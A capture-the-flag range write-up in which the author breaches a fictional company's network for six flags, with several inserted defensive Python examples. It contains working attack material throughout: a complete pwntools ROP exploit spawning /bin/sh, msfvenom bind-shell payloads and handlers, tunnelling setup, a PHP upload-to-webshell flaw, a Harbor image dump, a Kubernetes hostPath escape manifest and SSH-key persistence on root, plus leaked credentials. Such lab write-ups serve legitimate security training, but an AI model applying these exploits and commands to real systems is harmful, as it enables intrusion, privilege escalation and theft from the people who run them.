
Target overview
In this range you play a penetration testing engineer hired to assess the network security posture of "SmartLink Technologies Ltd.". Your task is first to compromise the company's application services exposed to the public internet, then use post-exploitation techniques to move deeper into SmartLink's internal network. Along the way you look for weaknesses and vulnerabilities and take over every service one by one, until the whole internal network is under control. The range contains 6 flags spread across different hosts; finding and capturing them is the goal.
first-flag
We start with a single IP, so information gathering comes first
8.130.86.165
Probe it with nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-17 16:18 中国标准时间
Nmap scan report for 8.130.86.165
Host is up (0.029s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1024/tcp filtered kdm
1025/tcp filtered NFS-or-IIS
1033/tcp filtered netinfo
1068/tcp filtered instl_bootc
1433/tcp filtered ms-sql-s
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6667/tcp filtered irc
8080/tcp open http-proxy
Ports 80 and 8080 each host a web service: 80 is the company website, 8080 is a login page, as shown below


Weak passwords and other basic checks went nowhere, so scan for directories
---- Scanning URL: http://8.130.86.165/ ----
==> DIRECTORY: http://8.130.86.165/css/
==> DIRECTORY: http://8.130.86.165/fonts/
==> DIRECTORY: http://8.130.86.165/images/
+ http://8.130.86.165/index.html (CODE:200|SIZE:10887)
==> DIRECTORY: http://8.130.86.165/js/
+ http://8.130.86.165/server-status (CODE:403|SIZE:277)
---- Entering directory: http://8.130.86.165/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://8.130.86.165/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
All unimportant paths. 8080 is as follows, with no key information either
---- Scanning URL: http://8.130.86.165:8080/ ----
+ http://8.130.86.165:8080/index.php (CODE:200|SIZE:1027)
+ http://8.130.86.165:8080/robots.txt (CODE:200|SIZE:24)
+ http://8.130.86.165:8080/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://8.130.86.165:8080/static/
Run fscan against it directly; it reports that the login page is vulnerable to the ThinkPHP 5.0.23 method RCE, so the exploit tool does the rest
start vulscan
[*] WebTitle: http://8.130.86.165 code:200 len:10887 title:None
[*] WebTitle: http://8.130.86.165:8080 code:200 len:1027 title:Login Form
[+] http://8.130.86.165:8080 poc-yaml-thinkphp5023-method-rce poc1
flag1 is found in the root directory
/f1ag01_UdEv.txt
flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
Check the network interfaces
(www-data:/var/www/html/background/public) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.28.23.17 netmask 255.255.0.0 broadcast 172.28.255.255
inet6 fe80::216:3eff:fe03:f089 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:03:f0:89 txqueuelen 1000 (Ethernet)
RX packets 110635 bytes 75481457 (75.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 70843 bytes 22069897 (22.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1308 bytes 127326 (127.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1308 bytes 127326 (127.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Upload fscan and scan the subnet for services
./fscan -h 172.28.23.17/24
Internal services found; results as follows
172.28.23.26:80 open
172.28.23.17:80 open
172.28.23.17:22 open
172.28.23.26:22 open
172.28.23.33:22 open
172.28.23.26:21 open
172.28.23.33:8080 open
172.28.23.17:8080 open
[*] WebTitle: http://172.28.23.17:8080 code:200 len:1027 title:Login Form
[*] WebTitle: http://172.28.23.26 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[*] WebTitle: http://172.28.23.17 code:200 len:10887 title:None
[+] ftp://172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle: http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A
[*] WebTitle: http://172.28.23.33:8080/login;jsessionid=780BE0921163759119444BAE668B0C2A code:200 len:3860 title:智联科技 ERP 后台登陆
[+] http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2
Set up a proxy into the internal network. msf is used here: first generate a bind (forward-connect) meterpreter payload
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy
Start the handler
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 8.130.86.165
set lport 53857
run
Add the internal route
run post/multi/manage/autoroute
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 172.28.255.253 100 eth0
172.28.0.0 255.255.0.0 0.0.0.0 0 eth0
172.28.255.253 0.0.0.0 0.0.0.0 100 eth0
No IPv6 routes were found.
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.28.23.17
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.28.0.0/255.255.0.0 from host's routing table.
The shell is up; set up the socks5 proxy
192.168.72.149 1080
second-flag
Start accessing internal services, beginning with the targets from the fscan results
http://172.28.23.33:8080
This address has a heapdump leak; start with that

The path makes it easy to guess the Shiro framework, and capturing the traffic indeed shows the Shiro signature

Scan for the heapdump
/actuator/env
/actuator/heapdump
Use a tool to quickly analyze the dump and extract the key data; this yields the Shiro key

CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
Run the tool through the proxy, fill in the key and brute-force the gadget chain
Note that AES GCM must be ticked in the tool, because the leaked algMode = GCM
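From the defender's side, the leak above begins with unauthenticated reads of /actuator/heapdump and /actuator/env, which show up plainly in the web server access log. The detector below is an added example, not part of the original writeup or the target application; the log lines are constructed samples in combined log format, and the set of "sensitive" actuator endpoints is an assumption you may extend.

```python
import re
from collections import Counter
from typing import Dict, List

# Actuator endpoints whose exposure is a finding on its own: heapdump leaks
# in-memory secrets (here the Shiro key), env/configprops leak settings.
SENSITIVE_ACTUATORS = {"heapdump", "env", "configprops", "threaddump",
                       "mappings", "beans", "logfile"}

# Combined-log-format line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

# Constructed sample lines (not the range's real logs); the paths mirror the
# ones requested on this host.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2024:16:40:01 +0800] "GET /login HTTP/1.1" 200 3860 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Jul/2024:16:40:09 +0800] "GET /actuator/env HTTP/1.1" 200 8123 "-" "python-requests/2.31"
10.0.0.5 - - [17/Jul/2024:16:40:12 +0800] "GET /actuator/heapdump HTTP/1.1" 200 93456123 "-" "python-requests/2.31"
10.0.0.7 - - [17/Jul/2024:16:42:00 +0800] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27"
10.0.0.9 - - [17/Jul/2024:16:43:10 +0800] "GET /actuator/heapdump HTTP/1.1" 401 0 "-" "curl/8.4"
"""

def detect_actuator_access(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert per request that reached a sensitive actuator endpoint.
    A 401/403 is recorded as 'blocked'; a 2xx means the data actually left."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        parts = path.strip("/").split("/")
        if len(parts) < 2 or parts[0] != "actuator":
            continue
        endpoint = parts[1]
        if endpoint not in SENSITIVE_ACTUATORS:
            continue  # health/info are expected probe targets
        status = int(m.group("status"))
        alerts.append({
            "client": m.group("ip"),
            "endpoint": endpoint,
            "status": str(status),
            "outcome": "leaked" if status < 300 else "blocked",
        })
    return alerts

def leaked_by_client(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Count successful sensitive-endpoint reads per client address."""
    return dict(Counter(a["client"] for a in alerts if a["outcome"] == "leaked"))
```

The fix on the application side is to stop serving these endpoints at all, for example by restricting management.endpoints.web.exposure.include to health and info.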

Command execution works; inject a memory shell

冰蝎[Filter] 注入成功!
路径:http://172.28.23.33:8080/1.ico
密码:123
RCE achieved

Checking the network interfaces shows two NICs, so there is a further internal segment
/ >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.28.23.33 netmask 255.255.0.0 broadcast 172.28.255.255
inet6 fe80::216:3eff:fe04:93d5 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:93:d5 txqueuelen 1000 (Ethernet)
RX packets 95489 bytes 82892482 (82.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 46479 bytes 544617803 (544.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.10.16 netmask 255.255.255.0 broadcast 172.22.10.255
inet6 fe80::216:3eff:fe04:62e prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:06:2e txqueuelen 1000 (Ethernet)
RX packets 687 bytes 28854 (28.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 702 bytes 30000 (30.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1308 bytes 133017 (133.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1308 bytes 133017 (133.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Check the listening ports
/ >netstat -anupl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
/ >netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 649/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
There is a service on a high port; probing shows it is a PWN challenge. The exploit is as follows
from pwn import *
context.arch = 'amd64'

# Menu helpers for the HashNote service
def add(key, data=b'b'):
    p.sendlineafter(b'Option:', b'1')
    p.sendlineafter(b'Key:', key)
    p.sendlineafter(b'Data:', data)

def show(key):
    p.sendlineafter(b'Option:', b'2')
    p.sendlineafter(b"Key: ", key)

def edit(key, data):
    p.sendlineafter(b'Option:', b'3')
    p.sendlineafter(b'Key:', key)
    p.sendlineafter(b'Data:', data)

def name(username):
    p.sendlineafter(b'Option:', b'4')
    p.sendlineafter(b'name:', username)

p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username = 0x5dc980
stack = 0x5e4fa8
ukey = b'\x30'*5 + b'\x31' + b'\x44'
# First fake chunk: points the entry at a stack address so show() leaks it
fake_chunk = flat({
    0: username+0x10,
    0x10: [username+0x20, len(ukey), ukey, 0],
    0x30: [stack, 0x10]
}, filler=b'\x00')
p.sendlineafter(b'name', fake_chunk)
p.sendlineafter(b'word', b'freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44', b'test')  # 126
add(b'\x30'*2+b'\x31'+b'\x44', b'test')  # 127
show(ukey)
main_ret = u64(p.read(8)) - 0x1e0
# Gadgets (static binary)
rdi = 0x0000000000405e7c      # pop rdi ; ret
rsi = 0x000000000040974f      # pop rsi ; ret
rdx = 0x000000000053514b      # pop rdx ; pop rbx ; ret
rax = 0x00000000004206ba      # pop rax ; ret
syscall = 0x00000000004560c6  # syscall
# Second fake chunk: entry now points at the saved return address
fake_chunk = flat({
    0: username+0x20,
    0x20: [username+0x30, len(ukey), ukey, 0],
    0x40: [main_ret, 0x100, b'/bin/sh\x00']
}, filler=b'\x00')
name(fake_chunk.ljust(0x80, b'\x00'))
payload = flat([
    rdi, username+0x50,
    rsi, 0,
    rdx, 0, 0,
    rax, 0x3b,
    syscall
])
p.sendlineafter(b'Option:', b'3')
p.sendlineafter(b'Key:', ukey)
p.sendline(payload)
p.sendlineafter(b'Option:', b'9')
p.interactive()

flag03:flag{6a326f94-6526-4586-8233-152d137281fd}
third-flag
Upload fscan and scan the other subnet
./fscan -h 172.22.10.16/24
Results below; nothing of value
172.22.10.16:8080 open
172.22.10.28:3306 open
172.22.10.28:80 open
172.22.10.16:22 open
172.22.10.28:22 open
[*] WebTitle: http://172.22.10.16:8080 code:302 len:0 title:None 跳转url: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549
[*] WebTitle: http://172.22.10.16:8080/login;jsessionid=9693A38E81A24F057146E1490FB3D549 code:200 len:3860 title:智联科技 ERP 后台登陆
[*] WebTitle: http://172.22.10.28 code:200 len:1975 title:DooTask
[+] http://172.22.10.16:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.22.10.16:8080 poc-yaml-springboot-env-unauth spring2
There is also an anonymous FTP; pull the OA source code down through the proxy

One thing to note about the FTP here: I used WinSCP, but with any tool, when connecting to the anonymous FTP through a proxy you need to enable passive mode, otherwise you cannot connect to the FTP server. Of course, if you cannot remember whether passive mode should be on or off, just try both; I mention it here only so that you remember FTP connections have a passive-mode issue.
Audit the OA code; this part tests code auditing
uploadbase64.php allows file upload; the code is as follows
<?php
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = "." . $result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
The only restriction is that the input must start with a data: URI prefix; the base64 content after it is decoded and written out
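To make the root cause concrete, here is the same check reimplemented in Python beside a hardened version: the extension is derived from the (\w+) group of the regex, so the subtype is never compared against an allow-list and the decoded bytes are never inspected. This is an added example, not code from the OA system; the allow-list, signature table and sample inputs are constructed for the demonstration.

```python
import base64
import re
import uuid
from datetime import date
from typing import Optional

# Same pattern as uploadbase64.php: the (\w+) group becomes the file
# extension, so any word characters after "image/" are accepted.
DATA_URI = re.compile(r'^(data:\s*image/(\w+);base64,)')

# Allow-list of image subtypes with the signature bytes the decoded payload
# must begin with (assumed set for this example; extend as needed).
ALLOWED_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def _new_path(ext: str) -> str:
    # upload/YYYY-MM-DD-<unique>.<ext>, mirroring the PHP date()/uniqid() scheme
    return "upload/" + date.today().isoformat() + "-" + uuid.uuid4().hex + "." + ext

def vulnerable_target_path(img: str) -> Optional[str]:
    """Reproduces the original logic: the extension is copied from the URI."""
    m = DATA_URI.match(img)
    if not m:
        return None  # the PHP would write to an undefined $path here
    return _new_path(m.group(2))

def hardened_target_path(img: str) -> Optional[str]:
    """Same flow, but the subtype must be allow-listed and the decoded bytes
    must carry the matching image signature before a path is issued."""
    m = DATA_URI.match(img)
    if not m:
        return None
    subtype = m.group(2).lower()
    if subtype not in ALLOWED_SIGNATURES:
        return None  # image/php and the like never reach the filesystem
    try:
        payload = base64.b64decode(img[m.end():], validate=True)
    except ValueError:
        return None  # malformed base64 is rejected instead of written
    if not payload.startswith(ALLOWED_SIGNATURES[subtype]):
        return None  # declared type and actual content disagree
    return _new_path(subtype)

# Constructed sample inputs (not the range's real upload): a minimal PNG
# header, and a non-image body declared as image/php.
SAMPLE_PNG = "data:image/png;base64," + base64.b64encode(
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()
SAMPLE_SCRIPT = "data:image/php;base64," + base64.b64encode(
    b"not an image at all").decode()
```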


The PHP webshell uploads successfully
imgbase64=

Many functions are disabled (disable_functions); bypass that with the AntSword plugin
Accessing /upload/.antproxy.php directly returns 404; edit the generated source under /upload/ and add uploads/ to the path

It turns out .antproxy.php still cannot be connected to for privilege escalation, so change POST to GET in the webshell, adjust the path, and execute commands through the GET parameter; this yields a flag on this server

Many file-reading commands are filtered too, so privilege escalation seems necessary since www is too low-privileged. Check the SUID binaries
find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep
base32 is in the list, so no privilege escalation is needed: read the file directly with base32
Use base32 to read the flag
http://172.28.23.26/upload/.antproxy.php?1=echo `base32 /flag02.txt`;
MZWGCZZQGI5CAZTMMFTXWNJWMQZTONZTGQWTKZRXGMWTINBXMYWWEMLBGUWWCOBTMY2DKNJUHFRD EOD5BI======
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
fourth-flag
Check this host's network interfaces
eth0 Link encap:Ethernet HWaddr 00:16:3e:04:5b:6e
inet addr:172.28.23.26 Bcast:172.28.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe04:5b6e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:59474 errors:0 dropped:0 overruns:0 frame:0
TX packets:23798 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:62043614 (62.0 MB) TX bytes:16736593 (16.7 MB)
eth1 Link encap:Ethernet HWaddr 00:16:3e:03:fe:6e
inet addr:172.22.14.6 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe03:fe6e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1362 errors:0 dropped:0 overruns:0 frame:0
TX packets:1366 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:58300 (58.3 KB) TX bytes:58332 (58.3 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:691 errors:0 dropped:0 overruns:0 frame:0
TX packets:691 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:76373 (76.3 KB) TX bytes:76373 (76.3 KB)
Dual-NIC again. Upload fscan to scan the other subnet and bring this host onto msf with a bind payload; AntSword cannot execute any commands at all, so the GET webshell from before is used to bring it onto msf and run fscan
cd /tmp;chmod +x fscan;./fscan -h 172.22.14.6/24
A second msf instance is needed here, going through the first msf's first-layer proxy, to reach the bind shell
Same steps: generate the bind payload first
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53857 -f elf > hzy
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 172.28.23.26
set lport 53857
run

Shell obtained. Add this layer's route on this msf instance and the internal pentest can continue; as usual, scan with fscan first
chmod 777 /tmp/fscan
cd /tmp;./fscan -h 172.22.14.6/24
At this point the very first shell dropped and could not be reconnected, so generate a new bind payload on a different port
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=53858 -f elf > hzy
After the proxy was re-established the earlier scan results were retrieved as well, as follows
172.22.14.6:80 open
172.22.14.6:22 open
172.22.14.37:10250 open
172.22.14.46:22 open
172.22.14.37:22 open
172.22.14.37:2379 open
172.22.14.46:80 open
172.22.14.6:21 open
[*] WebTitle: http://172.22.14.46 code:200 len:785 title:Harbor
[*] WebTitle: http://172.22.14.6 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] InfoScan:http://172.22.14.46 [Harbor]
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19 title:None
[+] ftp://172.22.14.6:21:anonymous
[->]OASystem.zip
[+] http://172.22.14.46/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]
msf was abandoned here too; frp or Stowaway are more stable, and the latter is both stable and convenient for building an internal proxy. I used a VPS here; in a competition you can use your own private IP
Upload linux_x64_agent on the first-layer edge host
./linux_x64_agent -c VPS:9999
Run the following on the VPS
./linux_x64_admin -l 9999
socks 5555
Start the socks5 proxy
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Socks start successfully!
Have the 新翔OA host (172.28.23.26) connect directly to the ThinkPHP host (172.28.23.17) as the second-layer proxy
(admin) >> use 0
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 1111
[*] Waiting for response......
[*] Node is listening on 1111
Then upload linux_x64_agent to 172.28.23.26 and run the following
./linux_x64_agent -c 172.28.23.17:1111
Once it runs, a new node is received
(node 0) >>
[*] New node come! Node id is 2
At this point the socks5 proxy opened earlier automatically includes 172.28.23.26's network, so the service can be accessed directly, as follows
http://172.22.14.46

Harbor unauthenticated access, CVE-2022-46463; exploit it directly
>python harbor.py
usage: harbor.py [-h] [--v2] [--dump IMAGENAME | --tags | --dump_all] url
harbor.py: error: the following arguments are required: url
>python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
>python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
[+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
This yields the flag

flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
fifth-flag
There was one more service above, DooTask
http://172.22.10.28

Dump the [+] project/projectadmin image; it contains the DooTask source jar


Decompiling it reveals the database connection details
BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
Just connect through the proxy. The tool Multiple.Database.Utilization.Tools is used here because, once connected, it can attempt some privilege-escalation operations directly, which saves time

One-click privilege escalation succeeds

flag6 obtained

flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}
sixth-flag
This one is not easy to spot. The very first scan found a high-port web service returning 404
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19 title:None

Without prior knowledge this is really hard to approach. It tests the K8s Kubelet unauthenticated access vulnerability, whose signature is port 10250 being open. 10250 could not be exploited here, but knowing it is K8s, unauthenticated access on other ports such as 10255 and 6443 can be tried; accessing 6443 here exposed the API

Next, exploit it: write the malicious yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /
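What makes this manifest dangerous is the hostPath volume mounting the node's root filesystem into the container; an admission policy or a pre-deploy audit should refuse it. The checker below is an added example, not part of the original writeup or of any cluster in the range: it walks a Pod or Deployment manifest (given here as a constructed JSON equivalent of the yaml above, which kubectl also accepts) and reports hostPath mounts, with the allowed-prefix list being an assumption.

```python
import json
from typing import Any, Dict, List

# Constructed JSON equivalent of the manifest above; only the fields the
# check looks at are kept.
SAMPLE_DEPLOYMENT = json.loads("""
{"apiVersion": "apps/v1", "kind": "Deployment",
 "metadata": {"name": "nginx-deployment"},
 "spec": {"template": {"spec": {
   "containers": [{"name": "nginx", "image": "nginx:1.8",
                   "volumeMounts": [{"mountPath": "/mnt", "name": "test-volume"}]}],
   "volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}]}}}}
""")

# hostPath prefixes a cluster policy might tolerate (assumed for this example).
ALLOWED_HOSTPATH_PREFIXES = ("/var/log/",)

def pod_spec(manifest: Dict[str, Any]) -> Dict[str, Any]:
    """Locate the pod spec for a bare Pod or a templated workload."""
    if manifest.get("kind") == "Pod":
        return manifest.get("spec", {})
    return manifest.get("spec", {}).get("template", {}).get("spec", {})

def audit_hostpath(manifest: Dict[str, Any]) -> List[str]:
    """Report every hostPath volume outside the allow-list, naming the
    container and mount point that exposes it; root ('/') is called out."""
    spec = pod_spec(manifest)
    findings: List[str] = []
    host_volumes = {v["name"]: v["hostPath"].get("path", "")
                    for v in spec.get("volumes", []) if "hostPath" in v}
    all_containers = spec.get("containers", []) + spec.get("initContainers", [])
    mounted = set()
    for c in all_containers:
        for mnt in c.get("volumeMounts", []):
            mounted.add(mnt.get("name"))
            path = host_volumes.get(mnt.get("name"))
            if path is None:
                continue  # emptyDir, configMap, etc. are not host mounts
            if path == "/":
                findings.append(f"{c['name']}: node root filesystem mounted at {mnt.get('mountPath')}")
            elif not path.startswith(ALLOWED_HOSTPATH_PREFIXES):
                findings.append(f"{c['name']}: hostPath {path} mounted at {mnt.get('mountPath')} not allow-listed")
    # hostPath volumes declared but never mounted are still worth noting
    for name, path in host_volumes.items():
        if name not in mounted:
            findings.append(f"volume {name}: unmounted hostPath {path}")
    return findings
```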
First install kubectl.exe on Windows; it is needed for the next steps
https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-windows/
Deploy the pod
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment configured
List the pods
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -n default
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-pfhwq 1/1 Running 0 35s
Exec into the container for a shell
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-pfhwq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: 1
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/#
root@nginx-deployment-864f8bfd6f-pfhwq:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
Shell obtained; now write a public key
The public key is the id_rsa.pub generated with ssh-keygen -t rsa -b 4096
ssh-keygen -t rsa -b 4096
cat /home/kali/.ssh/id_rsa.pub  # this is the content to write
echo "ssh-rsa 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 kali@kali" > /mnt/root/.ssh/authorized_keys
Then connect with the private key
proxychains ssh -i /home/kali/.ssh/id_rsa root@172.22.14.37

Root obtained. The database has a weak password
mysql -uroot -p
root
Find the flag in mysql
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flaghaha |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use flaghaha;
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04 |
+--------------------+
1 row in set (0.01 sec)
mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id | f1agggggishere |
+------+--------------------------------------------------------------+
| 1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
